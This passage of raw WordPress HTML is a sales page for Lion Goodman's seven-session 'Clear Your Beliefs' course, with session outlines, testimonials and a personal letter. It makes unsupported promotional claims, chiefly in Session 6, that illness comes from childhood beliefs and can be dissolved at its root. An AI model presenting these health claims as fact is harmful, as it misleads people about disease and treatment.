style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> 